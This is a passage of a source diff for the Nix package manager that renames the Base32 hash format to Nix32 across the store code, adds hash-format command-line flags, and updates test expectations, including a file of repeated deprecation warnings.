narInfo->url = "nar/" + narInfo->fileHash->to_string(HashFormat::Base32, false) + ".nar" - + (compression == "xz" ? ".xz" : + narInfo->url = "nar/" + narInfo->fileHash->to_string(HashFormat::Nix32, false) + ".nar" + + (compression == "xz" ? ".xz" : compression == "bzip2" ? ".bz2" : compression == "zstd" ? ".zst" : compression == "lzip" ? 
".lzip" : diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 4c3dc1f5c..802b39f84 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -1067,7 +1067,7 @@ void LocalDerivationGoal::initTmpDir() { env[i.first] = i.second; } else { auto hash = hashString(HashAlgorithm::SHA256, i.first); - std::string fn = ".attr-" + hash.to_string(HashFormat::Base32, false); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); Path p = tmpDir + "/" + fn; writeFile(p, rewriteStrings(i.second, inputRewrites)); chownToBuilder(p); diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc index de8194f73..f42a13126 100644 --- a/src/libstore/content-address.cc +++ b/src/libstore/content-address.cc @@ -61,7 +61,7 @@ std::string ContentAddress::render() const + makeFileIngestionPrefix(method); }, }, method.raw) - + this->hash.to_string(HashFormat::Base32, true); + + this->hash.to_string(HashFormat::Nix32, true); } /** diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index c68631c1a..664ab7556 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -958,7 +958,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva std::string hashPlaceholder(const OutputNameView outputName) { // FIXME: memoize? 
- return "/" + hashString(HashAlgorithm::SHA256, concatStrings("nix-output:", outputName)).to_string(HashFormat::Base32, false); + return "/" + hashString(HashAlgorithm::SHA256, concatStrings("nix-output:", outputName)).to_string(HashFormat::Nix32, false); } diff --git a/src/libstore/downstream-placeholder.cc b/src/libstore/downstream-placeholder.cc index 10df37fa4..91d47f946 100644 --- a/src/libstore/downstream-placeholder.cc +++ b/src/libstore/downstream-placeholder.cc @@ -5,7 +5,7 @@ namespace nix { std::string DownstreamPlaceholder::render() const { - return "/" + hash.to_string(HashFormat::Base32, false); + return "/" + hash.to_string(HashFormat::Nix32, false); } @@ -31,7 +31,7 @@ DownstreamPlaceholder DownstreamPlaceholder::unknownDerivation( xpSettings.require(Xp::DynamicDerivations); auto compressed = compressHash(placeholder.hash, 20); auto clearText = "nix-computed-output:" - + compressed.to_string(HashFormat::Base32, false) + + compressed.to_string(HashFormat::Nix32, false) + ":" + std::string { outputName }; return DownstreamPlaceholder { hashString(HashAlgorithm::SHA256, clearText) diff --git a/src/libstore/export-import.cc b/src/libstore/export-import.cc index 48718ef84..d57b25bd7 100644 --- a/src/libstore/export-import.cc +++ b/src/libstore/export-import.cc @@ -41,7 +41,7 @@ void Store::exportPath(const StorePath & path, Sink & sink) Hash hash = hashSink.currentHash().first; if (hash != info->narHash && info->narHash != Hash(info->narHash.algo)) throw Error("hash of path '%s' has changed from '%s' to '%s'!", - printStorePath(path), info->narHash.to_string(HashFormat::Base32, true), hash.to_string(HashFormat::Base32, true)); + printStorePath(path), info->narHash.to_string(HashFormat::Nix32, true), hash.to_string(HashFormat::Nix32, true)); teeSink << exportMagic diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index 5c413aa77..2bd3a2edc 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -50,7 +50,7 @@ static void makeSymlink(const Path & 
link, const Path & target) void LocalStore::addIndirectRoot(const Path & path) { - std::string hash = hashString(HashAlgorithm::SHA1, path).to_string(HashFormat::Base32, false); + std::string hash = hashString(HashAlgorithm::SHA1, path).to_string(HashFormat::Nix32, false); Path realRoot = canonPath(fmt("%1%/%2%/auto/%3%", stateDir, gcRootsDir, hash)); makeSymlink(realRoot, path); } diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index ef7dd7985..7e82bae28 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -1080,7 +1080,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, if (hashResult.first != info.narHash) throw Error("hash mismatch importing path '%s';\n specified: %s\n got: %s", - printStorePath(info.path), info.narHash.to_string(HashFormat::Base32, true), hashResult.first.to_string(HashFormat::Base32, true)); + printStorePath(info.path), info.narHash.to_string(HashFormat::Nix32, true), hashResult.first.to_string(HashFormat::Nix32, true)); if (hashResult.second != info.narSize) throw Error("size mismatch importing path '%s';\n specified: %s\n got: %s", @@ -1096,8 +1096,8 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, if (specified.hash != actualHash.hash) { throw Error("ca hash mismatch importing path '%s';\n specified: %s\n got: %s", printStorePath(info.path), - specified.hash.to_string(HashFormat::Base32, true), - actualHash.hash.to_string(HashFormat::Base32, true)); + specified.hash.to_string(HashFormat::Nix32, true), + actualHash.hash.to_string(HashFormat::Nix32, true)); } } @@ -1389,7 +1389,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) for (auto & link : readDirectory(linksDir)) { printMsg(lvlTalkative, "checking contents of '%s'", link.name); Path linkPath = linksDir + "/" + link.name; - std::string hash = hashPath(HashAlgorithm::SHA256, linkPath).first.to_string(HashFormat::Base32, false); + std::string hash = 
hashPath(HashAlgorithm::SHA256, linkPath).first.to_string(HashFormat::Nix32, false); if (hash != link.name) { printError("link '%s' was modified! expected hash '%s', got '%s'", linkPath, link.name, hash); @@ -1422,7 +1422,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) if (info->narHash != nullHash && info->narHash != current.first) { printError("path '%s' was modified! expected hash '%s', got '%s'", - printStorePath(i), info->narHash.to_string(HashFormat::Base32, true), current.first.to_string(HashFormat::Base32, true)); + printStorePath(i), info->narHash.to_string(HashFormat::Nix32, true), current.first.to_string(HashFormat::Nix32, true)); if (repair) repairPath(i); else errors = true; } else { diff --git a/src/libstore/nar-info-disk-cache.cc b/src/libstore/nar-info-disk-cache.cc index e50c15939..310105c75 100644 --- a/src/libstore/nar-info-disk-cache.cc +++ b/src/libstore/nar-info-disk-cache.cc @@ -333,9 +333,9 @@ public: (std::string(info->path.name())) (narInfo ? narInfo->url : "", narInfo != 0) (narInfo ? narInfo->compression : "", narInfo != 0) - (narInfo && narInfo->fileHash ? narInfo->fileHash->to_string(HashFormat::Base32, true) : "", narInfo && narInfo->fileHash) + (narInfo && narInfo->fileHash ? narInfo->fileHash->to_string(HashFormat::Nix32, true) : "", narInfo && narInfo->fileHash) (narInfo ? narInfo->fileSize : 0, narInfo != 0 && narInfo->fileSize) - (info->narHash.to_string(HashFormat::Base32, true)) + (info->narHash.to_string(HashFormat::Nix32, true)) (info->narSize) (concatStringsSep(" ", info->shortRefs())) (info->deriver ? 
std::string(info->deriver->to_string()) : "", (bool) info->deriver) diff --git a/src/libstore/nar-info.cc b/src/libstore/nar-info.cc index 25e2a7d7b..d9618d04c 100644 --- a/src/libstore/nar-info.cc +++ b/src/libstore/nar-info.cc @@ -114,10 +114,10 @@ std::string NarInfo::to_string(const Store & store) const assert(compression != ""); res += "Compression: " + compression + "\n"; assert(fileHash && fileHash->algo == HashAlgorithm::SHA256); - res += "FileHash: " + fileHash->to_string(HashFormat::Base32, true) + "\n"; + res += "FileHash: " + fileHash->to_string(HashFormat::Nix32, true) + "\n"; res += "FileSize: " + std::to_string(fileSize) + "\n"; assert(narHash.algo == HashAlgorithm::SHA256); - res += "NarHash: " + narHash.to_string(HashFormat::Base32, true) + "\n"; + res += "NarHash: " + narHash.to_string(HashFormat::Nix32, true) + "\n"; res += "NarSize: " + std::to_string(narSize) + "\n"; res += "References: " + concatStringsSep(" ", shortRefs()) + "\n"; diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc index cadf88347..b395453d1 100644 --- a/src/libstore/optimise-store.cc +++ b/src/libstore/optimise-store.cc @@ -147,10 +147,10 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, contents of the symlink (i.e. the result of readlink()), not the contents of the target (which may not even exist). */ Hash hash = hashPath(HashAlgorithm::SHA256, path).first; - debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Base32, true)); + debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Nix32, true)); /* Check if this is a known hash. */ - Path linkPath = linksDir + "/" + hash.to_string(HashFormat::Base32, false); + Path linkPath = linksDir + "/" + hash.to_string(HashFormat::Nix32, false); /* Maybe delete the link, if it has been corrupted. 
*/ if (pathExists(linkPath)) { diff --git a/src/libstore/parsed-derivations.cc b/src/libstore/parsed-derivations.cc index 73e55a96c..72f45143d 100644 --- a/src/libstore/parsed-derivations.cc +++ b/src/libstore/parsed-derivations.cc @@ -146,7 +146,7 @@ static nlohmann::json pathInfoToJSON( auto info = store.queryPathInfo(storePath); auto & jsonPath = jsonList.emplace_back( - info->toJSON(store, false, HashFormat::Base32)); + info->toJSON(store, false, HashFormat::Nix32)); // Add the path to the object whose metadata we are including. jsonPath["path"] = store.printStorePath(storePath); diff --git a/src/libstore/path-info.cc b/src/libstore/path-info.cc index 2d7dc972f..f58e31bfd 100644 --- a/src/libstore/path-info.cc +++ b/src/libstore/path-info.cc @@ -31,9 +31,9 @@ std::string ValidPathInfo::fingerprint(const Store & store) const throw Error("cannot calculate fingerprint of path '%s' because its size is not known", store.printStorePath(path)); return - "1;" + store.printStorePath(path) + ";" - + narHash.to_string(HashFormat::Base32, true) + ";" - + std::to_string(narSize) + ";" + "1;" + store.printStorePath(path) + ";" + + narHash.to_string(HashFormat::Nix32, true) + ";" + + std::to_string(narSize) + ";" + concatStringsSep(",", store.printStorePathSet(references)); } diff --git a/src/libstore/path.cc b/src/libstore/path.cc index d5257c939..1afd10af7 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -35,7 +35,7 @@ StorePath::StorePath(std::string_view _baseName) } StorePath::StorePath(const Hash & hash, std::string_view _name) - : baseName((hash.to_string(HashFormat::Base32, false) + "-").append(std::string(_name))) + : baseName((hash.to_string(HashFormat::Nix32, false) + "-").append(std::string(_name))) { checkName(baseName, name()); } diff --git a/src/libutil/args.cc b/src/libutil/args.cc index 7ea1647d9..e2668c673 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -544,11 +544,45 @@ nlohmann::json Args::toJSON() return res; } +static void 
hashFormatCompleter(AddCompletions & completions, size_t index, std::string_view prefix) +{ + for (auto & format : hashFormats) { + if (hasPrefix(format, prefix)) { + completions.add(format); + } + } +} + +Args::Flag Args::Flag::mkHashFormatFlagWithDefault(std::string &&longName, HashFormat * hf) { + assert(*hf == nix::HashFormat::SRI); + return Flag{ + .longName = std::move(longName), + .description = "hash format ('base16', 'nix32', 'base64', 'sri'). Default: 'sri'", + .labels = {"hash-format"}, + .handler = {[hf](std::string s) { + *hf = parseHashFormat(s); + }}, + .completer = hashFormatCompleter, + }; +} + +Args::Flag Args::Flag::mkHashFormatOptFlag(std::string && longName, std::optional * ohf) { + return Flag{ + .longName = std::move(longName), + .description = "hash format ('base16', 'nix32', 'base64', 'sri').", + .labels = {"hash-format"}, + .handler = {[ohf](std::string s) { + *ohf = std::optional{parseHashFormat(s)}; + }}, + .completer = hashFormatCompleter, + }; +} + static void hashAlgoCompleter(AddCompletions & completions, size_t index, std::string_view prefix) { - for (auto & type : hashAlgorithms) - if (hasPrefix(type, prefix)) - completions.add(type); + for (auto & algo : hashAlgorithms) + if (hasPrefix(algo, prefix)) + completions.add(algo); } Args::Flag Args::Flag::mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha) diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 653a9bbd6..18b0ae583 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -15,6 +15,7 @@ namespace nix { enum struct HashAlgorithm : char; +enum struct HashFormat : int; class MultiCommand; @@ -177,6 +178,8 @@ protected: static Flag mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha); static Flag mkHashAlgoOptFlag(std::string && longName, std::optional * oha); + static Flag mkHashFormatFlagWithDefault(std::string && longName, HashFormat * hf); + static Flag mkHashFormatOptFlag(std::string && longName, std::optional * ohf); }; /** diff --git 
a/src/libutil/hash.cc b/src/libutil/hash.cc index 38a29c459..30456ae5c 100644 --- a/src/libutil/hash.cc +++ b/src/libutil/hash.cc @@ -27,8 +27,9 @@ static size_t regularHashSize(HashAlgorithm type) { } -std::set hashAlgorithms = {"md5", "sha1", "sha256", "sha512" }; +const std::set hashAlgorithms = {"md5", "sha1", "sha256", "sha512" }; +const std::set hashFormats = {"base64", "nix32", "base16", "sri" }; Hash::Hash(HashAlgorithm algo) : algo(algo) { @@ -81,7 +82,7 @@ static std::string printHash16(const Hash & hash) // omitted: E O U T -const std::string base32Chars = "0123456789abcdfghijklmnpqrsvwxyz"; +const std::string nix32Chars = "0123456789abcdfghijklmnpqrsvwxyz"; static std::string printHash32(const Hash & hash) @@ -100,7 +101,7 @@ static std::string printHash32(const Hash & hash) unsigned char c = (hash.hash[i] >> j) | (i >= hash.hashSize - 1 ? 0 : hash.hash[i + 1] << (8 - j)); - s.push_back(base32Chars[c & 0x1f]); + s.push_back(nix32Chars[c & 0x1f]); } return s; @@ -110,7 +111,7 @@ static std::string printHash32(const Hash & hash) std::string printHash16or32(const Hash & hash) { assert(static_cast(hash.algo)); - return hash.to_string(hash.algo == HashAlgorithm::MD5 ? HashFormat::Base16 : HashFormat::Base32, false); + return hash.to_string(hash.algo == HashAlgorithm::MD5 ? HashFormat::Base16 : HashFormat::Nix32, false); } @@ -125,7 +126,7 @@ std::string Hash::to_string(HashFormat hashFormat, bool includeAlgo) const case HashFormat::Base16: s += printHash16(*this); break; - case HashFormat::Base32: + case HashFormat::Nix32: s += printHash32(*this); break; case HashFormat::Base64: @@ -230,8 +231,8 @@ Hash::Hash(std::string_view rest, HashAlgorithm algo, bool isSRI) for (unsigned int n = 0; n < rest.size(); ++n) { char c = rest[rest.size() - n - 1]; unsigned char digit; - for (digit = 0; digit < base32Chars.size(); ++digit) /* !!! slow */ - if (base32Chars[digit] == c) break; + for (digit = 0; digit < nix32Chars.size(); ++digit) /* !!! 
slow */ + if (nix32Chars[digit] == c) break; if (digit >= 32) throw BadHash("invalid base-32 hash '%s'", rest); unsigned int b = n * 5; @@ -388,7 +389,11 @@ Hash compressHash(const Hash & hash, unsigned int newSize) std::optional parseHashFormatOpt(std::string_view hashFormatName) { if (hashFormatName == "base16") return HashFormat::Base16; - if (hashFormatName == "base32") return HashFormat::Base32; + if (hashFormatName == "nix32") return HashFormat::Nix32; + if (hashFormatName == "base32") { + warn(R"("base32" is a deprecated alias for hash format "nix32".)"); + return HashFormat::Nix32; + } if (hashFormatName == "base64") return HashFormat::Base64; if (hashFormatName == "sri") return HashFormat::SRI; return std::nullopt; @@ -407,8 +412,8 @@ std::string_view printHashFormat(HashFormat HashFormat) switch (HashFormat) { case HashFormat::Base64: return "base64"; - case HashFormat::Base32: - return "base32"; + case HashFormat::Nix32: + return "nix32"; case HashFormat::Base16: return "base16"; case HashFormat::SRI: diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 3c97ed4b1..7bed9e2bd 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -20,9 +20,9 @@ const int sha1HashSize = 20; const int sha256HashSize = 32; const int sha512HashSize = 64; -extern std::set hashAlgorithms; +extern const std::set hashAlgorithms; -extern const std::string base32Chars; +extern const std::string nix32Chars; /** * @brief Enumeration representing the hash formats. @@ -31,8 +31,8 @@ enum struct HashFormat : int { /// @brief Base 64 encoding. /// @see [IETF RFC 4648, section 4](https://datatracker.ietf.org/doc/html/rfc4648#section-4). Base64, - /// @brief Nix-specific base-32 encoding. @see base32Chars - Base32, + /// @brief Nix-specific base-32 encoding. @see nix32Chars + Nix32, /// @brief Lowercase hexadecimal encoding. @see base16Chars Base16, /// @brief ":", format of the SRI integrity attribute. 
@@ -40,6 +40,8 @@ enum struct HashFormat : int { SRI }; +extern const std::set hashFormats; + struct Hash { constexpr static size_t maxHashSize = 64; diff --git a/src/libutil/references.cc b/src/libutil/references.cc index d82d51945..b30e62c7b 100644 --- a/src/libutil/references.cc +++ b/src/libutil/references.cc @@ -23,8 +23,8 @@ static void search( static bool isBase32[256]; std::call_once(initialised, [](){ for (unsigned int i = 0; i < 256; ++i) isBase32[i] = false; - for (unsigned int i = 0; i < base32Chars.size(); ++i) - isBase32[(unsigned char) base32Chars[i]] = true; + for (unsigned int i = 0; i < nix32Chars.size(); ++i) + isBase32[(unsigned char) nix32Chars[i]] = true; }); for (size_t i = 0; i + refLength <= s.size(); ) { diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 75ad4e75f..db45be2a8 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -406,7 +406,7 @@ static void opQuery(Strings opFlags, Strings opArgs) auto info = store->queryPathInfo(j); if (query == qHash) { assert(info->narHash.algo == HashAlgorithm::SHA256); - cout << fmt("%s\n", info->narHash.to_string(HashFormat::Base32, true)); + cout << fmt("%s\n", info->narHash.to_string(HashFormat::Nix32, true)); } else if (query == qSize) cout << fmt("%d\n", info->narSize); } @@ -769,8 +769,8 @@ static void opVerifyPath(Strings opFlags, Strings opArgs) if (current.first != info->narHash) { printError("path '%s' was modified! 
expected hash '%s', got '%s'", store->printStorePath(path), - info->narHash.to_string(HashFormat::Base32, true), - current.first.to_string(HashFormat::Base32, true)); + info->narHash.to_string(HashFormat::Nix32, true), + current.first.to_string(HashFormat::Nix32, true)); status = 1; } } @@ -898,7 +898,7 @@ static void opServe(Strings opFlags, Strings opArgs) out << info->narSize // downloadSize << info->narSize; if (GET_PROTOCOL_MINOR(clientVersion) >= 4) - out << info->narHash.to_string(HashFormat::Base32, true) + out << info->narHash.to_string(HashFormat::Nix32, true) << renderContentAddress(info->ca) << info->sigs; } catch (InvalidPath &) { diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 173043c8a..f9c7592a3 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -39,7 +39,7 @@ struct CmdHashBase : Command addFlag({ .longName = "base32", .description = "Print the hash in base-32 (Nix-specific) format.", - .handler = {&hashFormat, HashFormat::Base32}, + .handler = {&hashFormat, HashFormat::Nix32}, }); addFlag({ @@ -120,7 +120,7 @@ struct CmdToBase : Command { return fmt("convert a hash to %s representation", hashFormat == HashFormat::Base16 ? "base-16" : - hashFormat == HashFormat::Base32 ? "base-32" : + hashFormat == HashFormat::Nix32 ? "base-32" : hashFormat == HashFormat::Base64 ? "base-64" : "SRI"); } @@ -143,24 +143,8 @@ struct CmdHashConvert : Command std::vector hashStrings; CmdHashConvert(): to(HashFormat::SRI) { - addFlag({ - .longName = "from", - // TODO: List format choices. Maybe introduce a constant? - .description = "The format of the input hash.", - .labels = {"hash format"}, - .handler = {[this](std::string str) { - from = parseHashFormat(str); - }}, - }); - addFlag({ - .longName = "to", - // TODO: List format choices. Maybe introduce a constant? 
- .description = "The format of the output hash.", - .labels = {"hash format"}, - .handler = {[this](std::string str) { - to = parseHashFormat(str); - }}, - }); + addFlag(Args::Flag::mkHashFormatOptFlag("from", &from)); + addFlag(Args::Flag::mkHashFormatFlagWithDefault("to", &to)); addFlag(Args::Flag::mkHashAlgoOptFlag("algo", &algo)); expectArgs({ .label = "hashes", @@ -170,7 +154,15 @@ struct CmdHashConvert : Command std::string description() override { - return "convert between different hash formats, e.g. base16, nix32, base64 and sri."; + std::string descr( "convert between different hash formats. Choose from: "); + auto iter = hashFormats.begin(); + assert(iter != hashFormats.end()); + descr += *iter++; + while (iter != hashFormats.end()) { + descr += ", " + *iter++; + } + + return descr; } Category category() override { return catUtility; } @@ -197,7 +189,7 @@ struct CmdHash : NixMultiCommand {"file", []() { return make_ref(FileIngestionMethod::Flat);; }}, {"path", []() { return make_ref(FileIngestionMethod::Recursive); }}, {"to-base16", []() { return make_ref(HashFormat::Base16); }}, - {"to-base32", []() { return make_ref(HashFormat::Base32); }}, + {"to-base32", []() { return make_ref(HashFormat::Nix32); }}, {"to-base64", []() { return make_ref(HashFormat::Base64); }}, {"to-sri", []() { return make_ref(HashFormat::SRI); }}, }) @@ -230,7 +222,7 @@ static int compatNixHash(int argc, char * * argv) printVersion("nix-hash"); else if (*arg == "--flat") flat = true; else if (*arg == "--base16") hashFormat = HashFormat::Base16; - else if (*arg == "--base32") hashFormat = HashFormat::Base32; + else if (*arg == "--base32") hashFormat = HashFormat::Nix32; else if (*arg == "--base64") hashFormat = HashFormat::Base64; else if (*arg == "--sri") hashFormat = HashFormat::SRI; else if (*arg == "--truncate") truncate = true; @@ -244,7 +236,7 @@ static int compatNixHash(int argc, char * * argv) } else if (*arg == "--to-base32") { op = opTo; - hashFormat = HashFormat::Base32; 
+ hashFormat = HashFormat::Nix32; } else if (*arg == "--to-base64") { op = opTo; diff --git a/src/nix/verify.cc b/src/nix/verify.cc index cd0f6d95f..f0234f7be 100644 --- a/src/nix/verify.cc +++ b/src/nix/verify.cc @@ -109,8 +109,8 @@ struct CmdVerify : StorePathsCommand act2.result(resCorruptedPath, store->printStorePath(info->path)); printError("path '%s' was modified! expected hash '%s', got '%s'", store->printStorePath(info->path), - info->narHash.to_string(HashFormat::Base32, true), - hash.first.to_string(HashFormat::Base32, true)); + info->narHash.to_string(HashFormat::Nix32, true), + hash.first.to_string(HashFormat::Nix32, true)); } } diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index 031e33adf..278ed83b9 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -163,7 +163,7 @@ try3() { sri=$(nix hash convert --algo "$1" --from base16 "$2") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" --from base32 "$3") + sri=$(nix hash convert --algo "$1" --from nix32 "$3") [ "$sri" = "$1-$4" ] sri=$(nix hash convert --algo "$1" --from base64 "$4") [ "$sri" = "$1-$4" ] @@ -172,11 +172,11 @@ try3() { # Asserting input format fails. 
# - fail=$(nix hash convert --algo "$1" --from base32 "$2" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?") [[ "$fail" == "error: input hash"*"exit: 1" ]] fail=$(nix hash convert --algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") [[ "$fail" == "error: input hash"*"exit: 1" ]] - fail=$(nix hash convert --algo "$1" --from base32 "$4" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?") [[ "$fail" == "error: input hash"*"exit: 1" ]] } diff --git a/tests/functional/lang/eval-okay-convertHash.err.exp b/tests/functional/lang/eval-okay-convertHash.err.exp new file mode 100644 index 000000000..41d746725 --- /dev/null +++ b/tests/functional/lang/eval-okay-convertHash.err.exp @@ -0,0 +1,108 @@ +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". 
+warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". 
+warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". 
+warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". +warning: "base32" is a deprecated alias for hash format "nix32". 
diff --git a/tests/functional/lang/eval-okay-convertHash.exp b/tests/functional/lang/eval-okay-convertHash.exp index 60e0a3c49..16b0240e5 100644 --- a/tests/functional/lang/eval-okay-convertHash.exp +++ b/tests/functional/lang/eval-okay-convertHash.exp @@ -1 +1 @@ -{ hashesBase16 = [ "d41d8cd98f00b204e9800998ecf8427e" "6c69ee7f211c640419d5366cc076ae46" "bb3438fbabd460ea6dbd27d153e2233b" "da39a3ee5e6b4b0d3255bfef95601890afd80709" "cd54e8568c1b37cf1e5badb0779bcbf382212189" "6d12e10b1d331dad210e47fd25d4f260802b7e77" "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" "900a4469df00ccbfd0c145c6d1e4b7953dd0afafadd7534e3a4019e8d38fc663" "ad0387b3bd8652f730ca46d25f9c170af0fd589f42e7f23f5a9e6412d97d7e56" "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e" "9d0886f8c6b389398a16257bc79780fab9831c7fc11c8ab07fa732cb7b348feade382f92617c9c5305fefba0af02ab5fd39a587d330997ff5bd0db19f7666653" "21644b72aa259e5a588cd3afbafb1d4310f4889680f6c83b9d531596a5a284f34dbebff409d23bcc86aee6bad10c891606f075c6f4755cb536da27db5693f3a7" ]; hashesBase32 = [ "3y8bwfr609h3lh9ch0izcqq7fl" 